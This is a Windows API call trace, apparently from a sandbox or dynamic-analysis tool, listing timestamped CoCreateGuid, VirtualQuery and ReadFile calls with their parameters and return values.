	[0121.397] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x6fc5b77b, Data2=0xde79, Data3=0x4a9d, Data4=([0]=0xb2, [1]=0x3a, [2]=0xd, [3]=0xd2, [4]=0x4, [5]=0x83, [6]=0x5b, [7]=0x3f))) returned 0x0
	[0121.397] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x743b7f, Data2=0xbf4c, Data3=0x43e8, Data4=([0]=0xb4, [1]=0x9a, [2]=0xeb, [3]=0x44, [4]=0x39, [5]=0xc7, [6]=0x3c, [7]=0xbc))) returned 0x0
	[0121.398] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x1c1facd2, Data2=0x7f83, Data3=0x4275, Data4=([0]=0xae, [1]=0x80, [2]=0xd8, [3]=0xc0, [4]=0x98, [5]=0x4d, [6]=0xeb, [7]=0x5d))) returned 0x0
	[0121.398] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x1221fdf4, Data2=0x2aa7, Data3=0x4308, Data4=([0]=0xac, [1]=0x83, [2]=0xf7, [3]=0x10, [4]=0x78, [5]=0xb9, [6]=0x96, [7]=0x21))) returned 0x0
	[0121.398] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x224f6695, Data2=0x140d, Data3=0x4749, Data4=([0]=0xa9, [1]=0xd1, [2]=0x56, [3]=0x22, [4]=0x65, [5]=0x27, [6]=0xc7, [7]=0xc9))) returned 0x0
	[0121.398] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x6f4c843a, Data2=0x9fd6, Data3=0x4733, Data4=([0]=0xa6, [1]=0x96, [2]=0x82, [3]=0xb9, [4]=0xd5, [5]=0xbc, [6]=0xb, [7]=0x81))) returned 0x0
	[0121.399] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x4def578c, Data2=0xba0, Data3=0x4103, Data4=([0]=0x8c, [1]=0x65, [2]=0x49, [3]=0xac, [4]=0x7f, [5]=0xd8, [6]=0x74, [7]=0x1d))) returned 0x0
	[0121.399] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x21a58e5e, Data2=0x2fd3, Data3=0x4b77, Data4=([0]=0x81, [1]=0x51, [2]=0x2a, [3]=0x2, [4]=0x57, [5]=0x79, [6]=0x57, [7]=0xaf))) returned 0x0
	[0121.399] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x827c39eb, Data2=0x967b, Data3=0x439f, Data4=([0]=0xa0, [1]=0x89, [2]=0x29, [3]=0xef, [4]=0x4f, [5]=0xd, [6]=0xd, [7]=0xfe))) returned 0x0
	[0121.400] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x7ceaa41e, Data2=0x8139, Data3=0x44a6, Data4=([0]=0xa1, [1]=0x75, [2]=0x6f, [3]=0x41, [4]=0xb2, [5]=0x4e, [6]=0x73, [7]=0x31))) returned 0x0
	[0121.400] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x8e079b7b, Data2=0x115d, Data3=0x497c, Data4=([0]=0xbd, [1]=0xb8, [2]=0x7c, [3]=0x3a, [4]=0x49, [5]=0x82, [6]=0xfd, [7]=0xd8))) returned 0x0
	[0121.414] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x1f577889, Data2=0xc4fb, Data3=0x43d0, Data4=([0]=0x9b, [1]=0x26, [2]=0x73, [3]=0x9, [4]=0xa, [5]=0x44, [6]=0x8f, [7]=0x85))) returned 0x0
	[0121.414] VirtualQuery (in: lpAddress=0xedd89530, lpBuffer=0xd7edd8a3f0, dwLength=0x30 | out: lpBuffer=0xd7edd8a3f0*(BaseAddress=0xedd89000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff87000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0121.414] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xe2f773ec, Data2=0x8ef7, Data3=0x4c5d, Data4=([0]=0x95, [1]=0x84, [2]=0x6c, [3]=0x78, [4]=0xb3, [5]=0xa7, [6]=0x3f, [7]=0x9e))) returned 0x0
	[0121.415] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x410fce4f, Data2=0xcfee, Data3=0x4fb4, Data4=([0]=0x8f, [1]=0xca, [2]=0xc1, [3]=0xed, [4]=0xd1, [5]=0x98, [6]=0x27, [7]=0x84))) returned 0x0
	[0121.415] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xebe28d0e, Data2=0x6b98, Data3=0x4f96, Data4=([0]=0x90, [1]=0x20, [2]=0x42, [3]=0x95, [4]=0x32, [5]=0x49, [6]=0xbf, [7]=0x37))) returned 0x0
	[0121.415] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xd3aa7eb, Data2=0xf24, Data3=0x436f, Data4=([0]=0x84, [1]=0xe2, [2]=0xd, [3]=0x76, [4]=0xb8, [5]=0x82, [6]=0x66, [7]=0x73))) returned 0x0
	[0121.416] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xd99b3a78, Data2=0x8050, Data3=0x4e19, Data4=([0]=0xa1, [1]=0x42, [2]=0xbe, [3]=0xe3, [4]=0x39, [5]=0xbf, [6]=0x4e, [7]=0x3a))) returned 0x0
	[0121.416] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x49f4a904, Data2=0x7ce6, Data3=0x429e, Data4=([0]=0xbf, [1]=0xf0, [2]=0x55, [3]=0x48, [4]=0x3f, [5]=0xa8, [6]=0xee, [7]=0x14))) returned 0x0
	[0121.416] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xcc2155ae, Data2=0xd01c, Data3=0x4706, Data4=([0]=0xac, [1]=0xff, [2]=0x64, [3]=0x3a, [4]=0xb6, [5]=0xc6, [6]=0xec, [7]=0x7e))) returned 0x0
	[0121.416] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x7f5b7be4, Data2=0x62b4, Data3=0x4dd9, Data4=([0]=0xb3, [1]=0xa, [2]=0x2d, [3]=0xcc, [4]=0x5c, [5]=0xeb, [6]=0x36, [7]=0x86))) returned 0x0
	[0121.417] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x490e06d6, Data2=0x1fdd, Data3=0x45cf, Data4=([0]=0x8f, [1]=0x22, [2]=0x7d, [3]=0x56, [4]=0x5e, [5]=0xd5, [6]=0xbd, [7]=0x74))) returned 0x0
	[0121.417] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x80c296dc, Data2=0x19d3, Data3=0x48b9, Data4=([0]=0x8d, [1]=0xea, [2]=0x35, [3]=0x80, [4]=0xf, [5]=0x3e, [6]=0x3c, [7]=0xb8))) returned 0x0
	[0121.417] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xd8ddfad3, Data2=0x6d0, Data3=0x42ba, Data4=([0]=0xba, [1]=0x3, [2]=0xac, [3]=0xb0, [4]=0xa7, [5]=0x17, [6]=0x5e, [7]=0x13))) returned 0x0
	[0121.417] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x763ddb94, Data2=0x6477, Data3=0x4a5c, Data4=([0]=0xb4, [1]=0xad, [2]=0x8a, [3]=0xb6, [4]=0x6e, [5]=0xc5, [6]=0x28, [7]=0x4e))) returned 0x0
	[0121.418] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xe85c7008, Data2=0xe5bc, Data3=0x4b00, Data4=([0]=0xbd, [1]=0x68, [2]=0x53, [3]=0x7e, [4]=0x3f, [5]=0x5e, [6]=0x24, [7]=0xd4))) returned 0x0
	[0121.418] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xf0a93369, Data2=0xca5e, Data3=0x4414, Data4=([0]=0xaf, [1]=0x96, [2]=0xba, [3]=0x5b, [4]=0xe9, [5]=0xf4, [6]=0x42, [7]=0x4))) returned 0x0
	[0121.418] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x215d18a9, Data2=0x4c07, Data3=0x4305, Data4=([0]=0xbe, [1]=0x1e, [2]=0x89, [3]=0x9f, [4]=0x6b, [5]=0x12, [6]=0x85, [7]=0x48))) returned 0x0
	[0121.419] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x2dd61774, Data2=0x44db, Data3=0x4d6d, Data4=([0]=0x9e, [1]=0x96, [2]=0xad, [3]=0xf8, [4]=0xc5, [5]=0xb0, [6]=0x67, [7]=0x94))) returned 0x0
	[0121.419] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xc6979f57, Data2=0xa055, Data3=0x406a, Data4=([0]=0x9f, [1]=0x26, [2]=0xf9, [3]=0x1b, [4]=0x6, [5]=0xaa, [6]=0x2f, [7]=0x31))) returned 0x0
	[0121.419] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x4aeca6bf, Data2=0x97d5, Data3=0x4969, Data4=([0]=0xb6, [1]=0xa6, [2]=0x44, [3]=0xd2, [4]=0xfe, [5]=0x37, [6]=0xcf, [7]=0x62))) returned 0x0
	[0121.419] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x3265dbe8, Data2=0x49b, Data3=0x4f28, Data4=([0]=0x9a, [1]=0xbd, [2]=0xd6, [3]=0x29, [4]=0x9b, [5]=0xb6, [6]=0xae, [7]=0xae))) returned 0x0
	[0121.420] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x745b18b5, Data2=0xc846, Data3=0x4b2d, Data4=([0]=0xbf, [1]=0x57, [2]=0x46, [3]=0xe7, [4]=0xdc, [5]=0xd1, [6]=0x3b, [7]=0x5d))) returned 0x0
	[0121.420] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xc0543d5c, Data2=0x9aa9, Data3=0x44cb, Data4=([0]=0x8d, [1]=0x2a, [2]=0xdf, [3]=0x9b, [4]=0xb, [5]=0xbb, [6]=0xf1, [7]=0xce))) returned 0x0
	[0121.420] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xf22bb22e, Data2=0x2ac8, Data3=0x453f, Data4=([0]=0xba, [1]=0x6a, [2]=0x5, [3]=0x6, [4]=0x28, [5]=0x7b, [6]=0xd7, [7]=0xf9))) returned 0x0
	[0121.420] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xa9434a8e, Data2=0x31b9, Data3=0x4c66, Data4=([0]=0x9c, [1]=0x29, [2]=0x8a, [3]=0x1, [4]=0xda, [5]=0x59, [6]=0x9d, [7]=0x67))) returned 0x0
	[0121.421] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x6ceb9edf, Data2=0xc98c, Data3=0x4b33, Data4=([0]=0xa4, [1]=0x7b, [2]=0xfa, [3]=0xc5, [4]=0x94, [5]=0x1e, [6]=0x14, [7]=0xb2))) returned 0x0
	[0121.421] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xdca8ea14, Data2=0x9477, Data3=0x4383, Data4=([0]=0xb5, [1]=0x5a, [2]=0xa0, [3]=0x6d, [4]=0x3b, [5]=0xf0, [6]=0xcc, [7]=0xdc))) returned 0x0
	[0121.421] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x49d7511a, Data2=0x3411, Data3=0x468a, Data4=([0]=0xa1, [1]=0xce, [2]=0x1b, [3]=0xbf, [4]=0xea, [5]=0x6b, [6]=0x11, [7]=0xcd))) returned 0x0
	[0121.422] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x6c94d494, Data2=0xe899, Data3=0x496f, Data4=([0]=0xbc, [1]=0x7c, [2]=0xe1, [3]=0xc6, [4]=0x6d, [5]=0x3c, [6]=0x2b, [7]=0xa4))) returned 0x0
	[0121.422] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xbdf7fa1d, Data2=0xad53, Data3=0x45b0, Data4=([0]=0x8d, [1]=0xe1, [2]=0x15, [3]=0x1a, [4]=0xda, [5]=0x27, [6]=0xda, [7]=0x9d))) returned 0x0
	[0121.422] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x484fde7d, Data2=0x1866, Data3=0x4eff, Data4=([0]=0x9d, [1]=0xcc, [2]=0xd6, [3]=0x52, [4]=0x49, [5]=0x5e, [6]=0xe5, [7]=0xfa))) returned 0x0
	[0121.422] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x755599ab, Data2=0xf002, Data3=0x4853, Data4=([0]=0x85, [1]=0xe9, [2]=0xe6, [3]=0x9e, [4]=0x4d, [5]=0x96, [6]=0xcd, [7]=0x99))) returned 0x0
	[0121.423] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x8ec53a2d, Data2=0x7eca, Data3=0x484e, Data4=([0]=0x88, [1]=0x44, [2]=0x9d, [3]=0xa3, [4]=0xa, [5]=0xf9, [6]=0x9e, [7]=0x2a))) returned 0x0
	[0121.423] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x1e774acf, Data2=0x4fad, Data3=0x414f, Data4=([0]=0xbc, [1]=0x7c, [2]=0x63, [3]=0xdf, [4]=0xff, [5]=0x47, [6]=0x4, [7]=0x87))) returned 0x0
	[0121.423] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xa326b110, Data2=0x6f71, Data3=0x485e, Data4=([0]=0xb7, [1]=0xb2, [2]=0xa, [3]=0x4d, [4]=0xfe, [5]=0x89, [6]=0x3d, [7]=0xe3))) returned 0x0
	[0121.423] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x929fd3ff, Data2=0x3316, Data3=0x4d13, Data4=([0]=0x97, [1]=0xa9, [2]=0x3c, [3]=0x6e, [4]=0x9e, [5]=0x7b, [6]=0x8d, [7]=0x41))) returned 0x0
	[0121.424] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xedf37cac, Data2=0x8812, Data3=0x4b86, Data4=([0]=0xbc, [1]=0x33, [2]=0xd4, [3]=0xe2, [4]=0x6c, [5]=0x58, [6]=0x45, [7]=0xc8))) returned 0x0
	[0121.424] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x4a7e8b6c, Data2=0x7c2a, Data3=0x4d94, Data4=([0]=0x8d, [1]=0xd9, [2]=0x21, [3]=0x27, [4]=0xee, [5]=0xc4, [6]=0x4c, [7]=0xc5))) returned 0x0
	[0121.424] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x5bae370f, Data2=0x3635, Data3=0x468e, Data4=([0]=0xbd, [1]=0x8c, [2]=0xb8, [3]=0x46, [4]=0x1e, [5]=0xfa, [6]=0x61, [7]=0x74))) returned 0x0
	[0121.424] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x9cda488, Data2=0xc72b, Data3=0x4bbf, Data4=([0]=0x82, [1]=0xbb, [2]=0x4f, [3]=0xdc, [4]=0x46, [5]=0x4b, [6]=0xe5, [7]=0x4e))) returned 0x0
	[0121.425] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x5aab1064, Data2=0x54b3, Data3=0x426c, Data4=([0]=0x84, [1]=0x21, [2]=0x7d, [3]=0xec, [4]=0x3a, [5]=0x1f, [6]=0x9, [7]=0x6b))) returned 0x0
	[0121.427] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x439ffe2, Data2=0xc245, Data3=0x4fb8, Data4=([0]=0x84, [1]=0x15, [2]=0xd6, [3]=0x2, [4]=0x57, [5]=0x61, [6]=0xc8, [7]=0xba))) returned 0x0
	[0121.427] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x203461e1, Data2=0xd2e8, Data3=0x43e3, Data4=([0]=0x8d, [1]=0x7, [2]=0xbd, [3]=0x38, [4]=0x32, [5]=0x3d, [6]=0xdc, [7]=0xc4))) returned 0x0
	[0121.428] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x7908b23c, Data2=0x734f, Data3=0x43c6, Data4=([0]=0xb3, [1]=0xe5, [2]=0x7a, [3]=0x4c, [4]=0xa7, [5]=0xfd, [6]=0x7f, [7]=0xab))) returned 0x0
	[0121.428] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x7be4e8e4, Data2=0x2288, Data3=0x4776, Data4=([0]=0x8e, [1]=0x19, [2]=0x9b, [3]=0x63, [4]=0x74, [5]=0x69, [6]=0xfb, [7]=0xfc))) returned 0x0
	[0121.428] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xcdfb1fb4, Data2=0xe84b, Data3=0x4202, Data4=([0]=0x98, [1]=0xe3, [2]=0x78, [3]=0xdb, [4]=0x7a, [5]=0x64, [6]=0x6c, [7]=0x4b))) returned 0x0
	[0121.431] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.431] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.431] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.431] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.431] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.431] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.431] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.432] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.433] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.433] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.434] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.434] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.434] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.434] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.434] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.434] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.434] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.434] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.435] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.435] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.435] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.435] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.435] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.435] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.437] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.438] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.438] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.438] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.438] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.438] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.438] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.438] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.438] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23d767a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23d767a8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
